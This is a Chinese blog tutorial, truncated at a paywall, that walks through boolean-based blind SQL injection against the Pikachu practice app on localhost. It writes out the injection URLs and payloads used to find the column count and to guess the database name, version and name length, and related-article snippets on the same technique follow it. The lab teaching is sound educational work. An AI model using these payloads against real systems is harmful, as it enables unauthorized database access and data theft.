sql注入练习之bool盲注

最新推荐文章于 2024-05-18 17:00:27 发布
最新推荐文章于 2024-05-18 17:00:27 发布
阅读量1.1k 收藏 4
点赞数 1
分类专栏: 渗透测试之注入攻击 文章标签: mysql 数据库 database
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/windStudyer/article/details/124912673
版权
本文详细介绍了SQL布尔型盲注的基本原理、相关函数以及实际操作步骤,通过实例展示了如何利用布尔型盲注技术来猜解数据库信息,包括数据库名、版本、表名和列名等。实验环境为phpstudy + apache + mysql + pikachu,通过观察返回页面的不同来判断条件真假,逐步揭示数据库结构。
摘要由CSDN通过智能技术生成

1.bool盲注的原理

以根据返回页面判断条件真假的注入

判断方式:

通过长度判断 length(): length(database())>=x

通过字符判断 substr():substr(database() ,1,1)= 's'

通过 ascII 码判断:ascii():ascii(substr(database(),1,1)) =x

2.bool盲注相关的函数

3.实验-bool盲注

实验环境:phpstudy+apache+mysql+pikachu

3.1判断注入点

否管它是什么注入,先输入数据看看情况。判断有注入点,本身就是一种注入行为,根据返回正常情况和不正常的情况比较有没有注入,盲注也是基于这一点,根据返回的非正常情况来判断注入是否正确。

这一关,查询用户名信息,猜测多办是搜索类型,需要考虑闭合。其次查询的结果可能有多列,这里还是先判断结果有多少列。通常情况是使用order by,我这里使用select。

3.1.1 实验操作之判断注入点

输入adc正常的显示是这样的

 

看看非正常情况。尝试了几中数据。abc’  abc”  abc% 都和正常显示一样,猜测很可能这个执行查询失败的时候是没有回显的,这个时候真么办呢??既然无回显,想办法让它显示不一样的结果呗。同样先猜测它的结果列数。尝试了order by 一系列,结果每什么变化,那就才用另外一种方式了。才用union联合。先测试用union select 1,2,3,4。。。

猜测到 2的时候,数据显示不一样了。

 

既然这样说明,只有2列,传入的实际参数 abc’ union select 1,2

http://127.0.0.1/pikachu/vul/sqli/sqli_blind_b.php?name=abc%27%20union%20select%201,2--+&submit=%E6%9F%A5%E8%AF%A2

3.1.2 分析结果

那么可以总结出,需要闭合’ ,结果分成2列。接下需要猜解数据库的信息.

3.2 猜解数据库

构造sql语句,根据前面的分析,这里需要考虑闭合、采用union联合来猜解。

3.2.1常规的猜解方式

使用函数猜解数据库名和数据库版本

http://127.0.0.1/pikachu/vul/sqli/sqli_blind_b.php?name=abc%27%20union%20select%201,database()--+&submit=%E6%9F%A5%E8%AF%A2

参数:abc’ union select 1,database()--+

 

http://127.0.0.1/pikachu/vul/sqli/sqli_blind_b.php?name=abc%27%20union%20select%201,version()--+&submit=%E6%9F%A5%E8%AF%A2

参数:abc’ union select 1,version()--+

 

得到数据库为pikachu,版本5.5.53 这里database(),可以换成其函数,也可以select database(),version() 常用的函数如下:

 

3.2.2 盲注的猜解方式

既然是盲注,肯定也需要用盲注的方式尝试。

盲注是通过条件真假来判断。

常用的函数length()、ascii() 、ord()、left()、regexp()

3.2.2.1 猜解数据库长度

这里使用length()计算猜数据库的长度。

http://127.0.0.1/pikachu/vul/sqli/sqli_blind_b.php?name=abc%27%20union%20select%201,length(database())%3E=7--+&submit=%E6%9F%A5%E8%AF%A2

参数:abc’ union select ,1,length(database())>=7--+

 

这个时候返回的是1,代表的是真。说明还没有猜中,还需要继续改条件,直到为假,为0。

http://127.0.0.1/pikachu/vul/sqli/sqli_blind_b.php?name=abc%27%20union%20select%201,length(database())%3E=8--+&submit=%E6%9F%A5%E8%AF%A2

参数:abc’ union select ,1,length(database())>=8--+

 

这个时候,返回0,代表的是假,从临界测试说明数据库名长度为7。

3.2.2.1.1 猜解长度结果

等于7

3.2.2.2 猜解数据库名

这里采用逐字猜解,使用到字符串重相关的函数。

猜解数据库名的第一个字符。

database()函数获取名字,然后取第一个字母,使用substr(database(),1,1)。

在数据库中尝试情况:

最低0.47元/天 解锁文章
fzsecurity
关注
专栏目录
bool盲注
m0_64100645的博客
11-24 326
根据以上两个值可以进行一定的猜测,然后将对一个的ASCII值代入其进行试验。第三列第一个 输入的是112 代码在上面图。当输入为101时 第一个表的字符为e。再次进行以上步骤,第二个表为users。username第一个字符为:D。当第二个字符输入117,页面显示正确。由上面可知,数据库的长度等于8。由以上推出为username。从以上代码可得到的是:Dumb。由上面可以得到,表长度为4。说明第一个表的字符大于79。判断username的长度。第一个是s,页面显示正常。2. 判断第一个表的长度。
SQL注入-布尔型盲注
qq_65240014的博客
07-26 626
关于sql注入的略微进阶一点的文章,介绍关于bool盲注的方法
Bool盲注
asdfghjkl978564的博客
11-16 258
最近看见了这个Bool盲注挺有趣,做个记录! 小技巧:substr(user(),1,1)等价于substr(user() from 1 for 1) 可以绕过逗号 参考脚本模板程序: 1 import request 2 import re 3 4 pattern = re.compile(r'2014-11-16') #此处是关键字 5 6 for...
pikachu(bool盲注)
ANYOUZHEN的博客
05-11 475
关于bool盲注原理:由于对方后端对用户的显示页面进行了处理,我们无法看到返回的数据库报错内容 由于进行处理,我们在页面输入框输入‘时不会返回数据库报错内容 输入kobe’ and 1=1# 我们可以使用select语句去判断: select ascii(substr(database(),1,1))>113; 它会返回0或者1,0是错的意思,1是对的意思 select ascii(substr(database(),1,1)>112; 通过判断0或者1 通过多次查询,我
SQL注入Bool盲注(510cms)
qq_45775897的博客
01-05 2999
SQL注入之get可以参考: https://blog.csdn.net/qq_45775897/article/details/122332051 一、查找是否存在SQL注入注入点) 以510企业网站为例: 这里以漏洞参数id为例 用?id=1和id=1'进行测试,前提能够正常显示。 在?id=1后面加上and 1=1两个结果都是真的,所以正常输出; 后面加上and 1=2如果正常输出,说明前后都是真的,则表示是字符型。反之是数值型 eg: http://IP地址(域名)/news.php?cid=&
sql注入bool盲注
banliyaoguai的博客
05-12 618
二分法的思想很简单,因为整个数组是有序的,数组默认是递增的。首先选择数组间的数字和需要查找的目标值比较如果相等最好,就可以直接返回答案了如果不相等如果间的数字大于目标值,则间数字向右的所有数字都大于目标值,全部排除如果间的数字小于目标值,则间数字向左的所有数字都小于目标值,全部排除。
SQL注入漏洞-04】布尔盲注靶场实战
cc
02-03 6647
当我们改变前端页面传输给后台sql参数时,页面没有显示相应内容也没有显示报错信息时,不能使用联合查询注入和报错注入,这时我们可以考虑是否为基于布尔的盲注。 利用页面返回的布尔类型状态,正常或者不正常; 我们输入的语句让页面呈现出两种状态,相当于true和false,根据这两种状态可以判断我们输入的语句是否查询成功。布尔盲注就是根据这两种状态,来反推我们输入的条件是真还是假。以sqli-labs-masterless-8关为例
mysql sql注入漏洞修复_SQL注入漏洞解析与靶场复现
weixin_36043375的博客
02-26 1292
1. 概述SQL注入(SQL Injectioin)漏洞是注入漏洞危害性最高的漏洞之一。形成的原因主要是在数据交互过程,前端的数据传入后端时,没有作严格的验证过滤导致传入的“数据”拼接到了SQL语句。被数据库当作SQL语句的一部分执行,从而使得数据面临被脱库、恶意破坏篡改甚至造成整个系统权限沦陷等一系列危害。注入攻击的本质是把用户输入的数据当作代码执行。造成注入攻击有两个关键条件:①用户能够...
WEB入门——SQL注入(一)
HasntStartIsOver的博客
06-03 1291
简单的SQL注入
SQL注入之基于布尔的盲注详解
09-10
首先说明的盲注注入的一种,指的是在不知道数据库返回值的情况下对数据的内容进行猜测,实施SQL注入盲注一般分为布尔盲注和基于时间的盲注。这篇文章主要讲解的是基于布尔的盲注。下面来一起看看吧。
sql注入漏洞
weixin_49472648的博客
04-27 3684
SQL注入漏洞 文章目录SQL注入漏洞一、SQL注入原理实现注入攻击的两个关键条件(重点)二、SQL注入危害三、SQL注入防御四、SQL注入分类五、SQL注入流程流程细节六、手工注入实例1、判断是否存在SQL注入点2、判断注入类型3、判断字段数4、判断回显位置5、判断数据库名6、确定表名7、确定字段名8、获取用户名与密码9、MD5解密—破解密码七、sqlmap注入实例1、判断是否存在注入点2、爆数据库名3、指定库名,列出所有元素4、指定库名、表名,列出所有字段5、指定库名、表名、字段名,列出指定字段 一、S
mysql bool盲注_Mysql 高级盲注之布尔型盲注【sqli blind】
weixin_39971132的博客
01-18 181
什么是盲注 [sqli blind]?盲注通常都是专门为了对付目标页面错误处理的比较好的这种情况,也就是说,有时即使目标存在注入,因为在页面上没有任何回显,此时再想利用常规的union曝数据字段可能就不大现实了,于是后来就被人发现了盲注这种技巧,关于盲注的常用类型,主要有三种,基于时间,布尔,错误[实际遇到的非常少]的盲注,不过我们今天暂时只针对布尔型盲注做详细说明,关于其它的技巧,后续还会再单...
sql注入-基于布尔型的盲注入门
aoxiangzhi3576的博客
05-28 646
0-SQL盲注的手工注入测试 确定字段长度 1' and length(user())>12# 确定字段内容 1' and substring(user(),1,1)>'a'# 这里的substring()函数的作用是提取字符串的字符.例如: substring('abcd',1,1)返回a subst...
6、盲注bool
最新发布
weixin_51520483的博客
05-18 631
1、注意在页面不报错的情况下,如何获取bool返回值,多学习其他的获取语法。
bool注入
qq_46540840的博客
03-14 836
sql注入-布尔盲注 以buuctf上的题具体来说 题目链接 方法一:布尔注入 方法二:报错注入 解题: 首先查看源代码:可以得到提示:得到一种思路:报错注入 这里拿布尔注入具体来说: 首先拿Bp判断: 输入name=admin &pass=1时:urldecode解码得到密码错误 name=1’or 1=1 # &pass=1 得到与1相同结果 name=1’or 1=2 # &pass=1得到是字符型注入 解释: 第一句是admin用户名是对的,密码不对 和第二局相对照 :
布尔盲注知识点
m0_75178803的博客
10-22 477
概念:布尔盲注一般适用于页面没有回显字段(不支持联合查询),且web页面返回True 或者 false,构造SQL语句,利用and,or等关键字来其后的语句truefalse使web页面返回true或者false,从而达到注入的目的来获取信息ascii() 函数,返回字符ascii码值参数 : str单字符length() 函数,返回字符串的长度参数 : str 字符串left() 函数,返回从左至右截取固定长度的字符串参数str,lengthstr : 字符串length:截取长度。
mysql bool盲注_bool盲注+各种姿势绕过过滤和替换
weixin_35019679的博客
01-27 853
题目来源题目界面比较简单,只让你输入id,输对了告诉你 You are in,输错了就 You are not in可以想到这是一个盲注,经简单测试,提交字母a进不去,1可以。也就是说通过注入如果进去了,说明注入的语句成功执行,反之没有执行,典型的bool盲注bool盲注的一般思路一般来说,bool盲注通常是通过一位一位爆破字符来实现的,常用的函数如下:1234567891011121314151...
SQL注入学习——Bool盲注详解 sqli-labs(Less 8)
未完成的歌~的博客
07-29 6595
Less-7导出文件GET字符型注 打开页面输入?id=1 试了很多发现报错信息都一样,查看下源代码: if($row) { echo '<font color= "#FFFF00">'; echo 'You are in.... Use outfile......'; echo "<br>"; echo "</font>"; ......
超级SQL注入工具V1.1使用详解:渗透测试利器
工具支持多种注入方式,包括Bool盲注、错误显示注入和Union注入,并兼容多种数据库系统,如Access、MySQL、SQLServer、Oracle等。此外,它还具备独特的多字节编码字符处理能力,可以在盲注环境获取各国语言数据...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值